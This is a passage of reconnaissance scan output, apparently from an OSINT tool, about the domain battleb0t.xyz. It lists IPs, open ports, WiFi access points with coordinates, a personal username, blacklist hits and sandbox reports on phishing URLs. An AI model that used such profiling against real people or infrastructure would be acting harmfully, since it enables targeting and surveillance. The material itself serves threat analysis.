| 2023-05-12 03:01:51 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.154:80 | 185.199.110.0/24 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000cap.github.io |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2082 | 188.114.96.1 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | VipAdsl (Net ID: 00:14:C1:39:05:41) | 40.2024, 29.0398 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | dvdbeyond (Net ID: 00:01:24:F2:B3:12) | 37.780462,-122.390564 |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 68.170.74.34.bc.googleusercontent.com | 34.74.170.68 |
| 2023-05-12 03:18:00 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [46.101.128.0/17]
http://cinsscore.com/list/ci-badguys.txt | 46.101.128.0/17 |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz. 244 IN CNAME battleb0t.github.io. | www.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:39:9C:50) | 50.1188, 8.6843 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Jupiter (Net ID: 00:02:2D:66:D2:47) | 50.1188, 8.6843 |
| 2023-05-12 03:15:46 | Username | No | Account Finder | 2 | 0 | 1 | 0 | None | patrick.pogoda | Patrick Pogoda |
| 2023-05-12 02:54:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://saranyakharidas.github.io/netflix', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://saranyakharidas.github.io/netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3260"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cbc_IE_EarlyTabStart_0xfe8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cbc_ConnHashTable<3260>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cbc_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cbc_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_cbc_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "header-image_1_.png" has type "PNG image data 1920 x 1080 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "feature-4_1_.png" has type "PNG image data 737 x 553 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "feature-1_1_.png" has type "PNG image data 762 x 572 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "feature-3_1_.png" has type "PNG image data 771 x 565 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "feature-2_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DFE5BD9B4EBBF926BD.TMP" has type "data"- Location: [%TEMP%\\~DFE5BD9B4EBBF926BD.TMP]- [targetUID: 00000000-00003260]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003260]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF597AB91525A4227D.TMP" has type "data"- Location: [%TEMP%\\~DF597AB91525A4227D.TMP]- [targetUID: 00000000-00003260]\n "~DF6FD83128DC293791.TMP" has type "data"- Location: [%TEMP%\\~DF6FD83128DC293791.TMP]- [targetUID: 00000000-00003260]\n "~DFBFBD8694A9325E58.TMP" has type "data"- Location: [%TEMP%\\~DFBFBD8694A9325E58.TMP]- [targetUID: 00000000-00003260]\n "~DFE4FEDDD5CB7A4BC1.TMP" has type "data"- Location: [%TEMP%\\~DFE4FEDDD5CB7A4BC1.TMP]- [targetUID: 00000000-00003260]\n "logo_1_.png" has type "PNG image data 300 x 81 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "netflix_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "RecoveryStore._6CB82DCF-CF8E-11ED-9CAE-0800270CD904_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_F4C4AB8E-CF8E-11ED-9CAE-0800270CD904_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_753E039C-CF8E-11ED-9CAE-0800270CD904_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6CB82DD1-CF8E-11ED-9CAE-0800270CD904_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://saranyakharidas.github.io/netflix/"\n Pattern match: "https://saranyakharidas.github.io"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025398951411231060253186993650831024027*"\n Pattern match: "www.msn.com/"\n Pattern match: "MUIDB331E24F2502163E33EAE361751A562BBieonline.microsoft.com/9216309609459231102498186665525831024027*"\n Pattern match: "SUIDMmicrosoft.com/9216296360537631024144186649900831024027*MUID331E24F2502163E33EAE361751A562BBmicrosoft.com/1025309609459231102498186665525831024027*_EDGE_V1microsoft.com/9216309609459231102498186681150831024027*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "SUIDMmicrosoft.com/9216296360537631024144186649900831024027*MUID331E24F2502163E33EAE361751A562BBmicrosoft.com/1025309609459231102498186665525831024027*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "SUIDMmicrosoft.com/9216296360537631024144186649900831024027*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "MUID24D9837EE44A60A413E9919BE5CE61B0msn.com/1025309609459231102498187009275831024027*"\n Pattern match: "https://saranyakharidas.github.io/netflix/Accept-Language"\n Pattern match: "iz.qgyu/\ufffd\ufffd\ufffd\ufffd\ufffd!O\ufffdq\u0696"\n Heuristic match: "aranyakharidas.github.io"\n Pattern match: "saranyakharidas.github.io/netflix/"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=32146res://wmploc.dll/ICW_ErrorPage.htm"\n Pattern match: "wmploc.dll/Service_Initial.htm"\n Pattern match: "wmploc.dll/Error_ServiceInfo.htm\'res://wmploc.dll/Offline_InfoCenter.htm&res://wmploc.dll/Offline_AlbumInfo.htm"\n Pattern match: "wmploc.dll/Service_NoFunc.htm%res://wmploc.dll/Service_No_Local.htm"\n Pattern match: "wmploc.dll/RT_IMAGE/ServiceLarge.png*res://wmploc.dll/RT_IMAGE/ServiceSmall.png*res://wmploc.dll/RT_IMAGE/ServiceSmall.png"\n Pattern match: "wmploc.dll/Blocked_AlbumInfo.htm&res://wmploc.dll/Blocked_AlbumInfo.htm,http://go.microsoft.com/fwlink/?LinkId=70183\'res://wmploc.dll/offline_radioguide.htm"\n Pattern match: "http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/"\n Pattern match: "redir.metaservices.microsoft.com/dvdcover/P"\n Pattern match: "http://redir.metaservices.microsoft.com/redir/buynow/"\n Pattern match: "http://windowsmedia.com/redir/findmedia.asp"\n Pattern match: "redir.metaservices.microsoft.com/redir/getmdrdvd/"\n Pattern match: "redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=h"\n Pattern match: "redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=321507Optimized"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=8792"\n Pattern match: "http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show"\n Pattern match: "http://windowsmedia.com/re | 185.199.109.153 |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent Ellen (Net ID: 00:14:5C:85:89:DC) | 50.8897, 6.0563 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.172): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 106 | 0 | 1 | 0 | None | 185.199.108.153 | battleb0t.xyz |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:8443 | 188.114.97.0/24 |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:8080 | 188.114.97.0/24 |
| 2023-05-12 02:53:25 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 104.21.71.14 | www.battleb0t.xyz |
| 2023-05-12 02:50:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'MSG-857488.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar8DEB.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar8E0C.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c08_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c08_IE_EarlyTabStart_0xbf8_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_c08_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3080"\n "UpdatingNewTabPageData"\n "IsoScope_c08_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c08_ConnHashTable<3080>_HashTable_Mutex"\n "IsoScope_c08_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3080"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "104.22.58.100:443"\n "13.35.125.82:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /docs/5.2/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /docs/5.2/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /docs/5.2/examples/sign-in/signin.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /docs/5.2/examples/sign-in/signin.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "C4Z44RUD.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C4Z44RUD.txt]- [targetUID: 00000000-00003080]\n Dropped file: "H6ZVHMSK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H6ZVHMSK.txt]- [targetUID: 00000000-00003080]\n Dropped file: "FM8F0076.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FM8F0076.txt]- [targetUID: 00000000-00003080]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab8E0B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003080]\n "Tar8DEB.tmp" has type "data"- Location: [%TEMP%\\Tar8DEB.tmp]- [targetUID: 00000000-00003320]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003320]\n "zepto.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00003080]\n "search_2_.json" has type "JSON data"- [targetUID: 00000000-00003080]\n "RecoveryStore._93FBEEE7-A204-11ED-A02A-080027908816_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003080]\n "_A22FD108-A204-11ED-A02A-080027908816_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003080]\n "C4Z44RUD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C4Z44RUD.txt]- [targetUID: 00000000-00003080]\n "~DF47C0C7E8E4881443.TMP" has type "data"- Location: [%TEMP%\\~DF47C0C7E8E4881443.TMP]- [targetUID: 00000000-00003080]\n "H6ZVHMSK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H6ZVHMSK.txt]- [targetUID: 00000000-00003080]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003080]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003320]\n "FM8F0076.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FM8F0076.txt]- [targetUID: 00000000-00003080]\n "Tar8E0C.tmp" has type "data"- Location: [%TEMP%\\Tar8E0C.tmp]- [targetUID: 00000000-00003320]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: 00000000-00003080]\n "~DFEC0F2E68E5E272C6.TMP" has type "data"- Location: [%TEMP%\\~DFEC0F2E68E5E272C6.TMP]- [targetUID: 00000000-00003080]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003080]\n "Cab8E0B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab8E0B.tmp]- [targetUID: 00000000-00003320]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003080]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003320]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u | 185.199.110.153 |
| 2023-05-12 02:54:16 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://oldfluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:09:06 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.82 | 165.232.113.85 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2096 | 172.67.168.252 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Paradiso Films - NL (Net ID: 00:01:21:31:1A:1A) | 52.3759, 4.8975 |
| 2023-05-12 02:52:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 50, u'search_terms': [{u'id': u'host', u'value': u'185.199.109.153'}], u'result': [{u'environment_id': 160, u'job_id': u'645b6155a80cd0e0770f030b', u'analysis_start_time': u'2023-05-10 09:18:14', u'vx_family': u'Phishing site', u'av_detect': u'36', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'6bb814d0675cd82e209cedb343425178e414f7dda68e799a8ce54849de914e9d', u'type': None, u'type_short': u'url', u'size': 115}, {u'environment_id': 100, u'job_id': u'645a1880d8c2eb0ad2084a9c', u'analysis_start_time': u'2023-05-09 09:55:12', u'vx_family': None, u'av_detect': u'13', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8d28d09db6f9b971dafb711d5d2e21e039d7e81e034a39169ce61ad566889661', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 100, u'job_id': u'6459d9402c433ca0470186e3', u'analysis_start_time': u'2023-05-09 05:25:21', u'vx_family': u'Phishing site', u'av_detect': u'36', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'ed04b7f222a527b1e85f9babecb3fab554ff7283a593f47833548c431796ae72', u'type': None, u'type_short': u'url', u'size': 87}, {u'environment_id': 110, u'job_id': u'6457d1ac915e31239c0ed46d', u'analysis_start_time': u'2023-05-07 16:28:29', u'vx_family': u'Phishing site', u'av_detect': u'37', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'6e596e1e4603bdc574bee547a3b38fedb41edc17ed085b4427a227ecb1371f38', u'type': None, u'type_short': u'url', u'size': 127}, {u'environment_id': 100, u'job_id': u'6455db89a38a0819380cd1e8', u'analysis_start_time': u'2023-05-06 04:46:02', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'63273b57b45d033047835de89bbd71ba014495b8b2a1928350903b52872c5dac', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 110, u'job_id': u'6455b9dd4be7eda3b4051287', u'analysis_start_time': u'2023-05-06 02:22:22', u'vx_family': u'Phishing site', u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'3bcef8455f2d32e5ceabf1fe3ddf35ab0e4117f859394b3a6d2bfe7f5b2d5704', u'type': None, u'type_short': u'url', u'size': 70}, {u'environment_id': 160, u'job_id': u'6455656ab722d8f30408b04a', u'analysis_start_time': u'2023-05-05 20:22:03', u'vx_family': u'Malware.Generic', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'rufus-4.0p.exe', u'sha256': u'bfecf4dcf1a63d8b64b900906102edf666642316291c9bba42eb0fb9c7bccbd6', u'type': None, u'type_short': u'64-bit exe', u'size': 1411144}, {u'environment_id': 160, u'job_id': u'64553526c1df1981aa02d9f2', u'analysis_start_time': u'2023-05-05 16:56:07', u'vx_family': u'Phishing site', u'av_detect': u'36', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'd8003cba1611b5cddce1700ade1d891193616df21b3cc73b4392d74f5ada921f', u'type': None, u'type_short': u'url', u'size': 81}, {u'environment_id': 110, u'job_id': u'6452f656b12b66922008c49e', u'analysis_start_time': u'2023-05-04 00:03:35', u'vx_family': u'Phishing site', 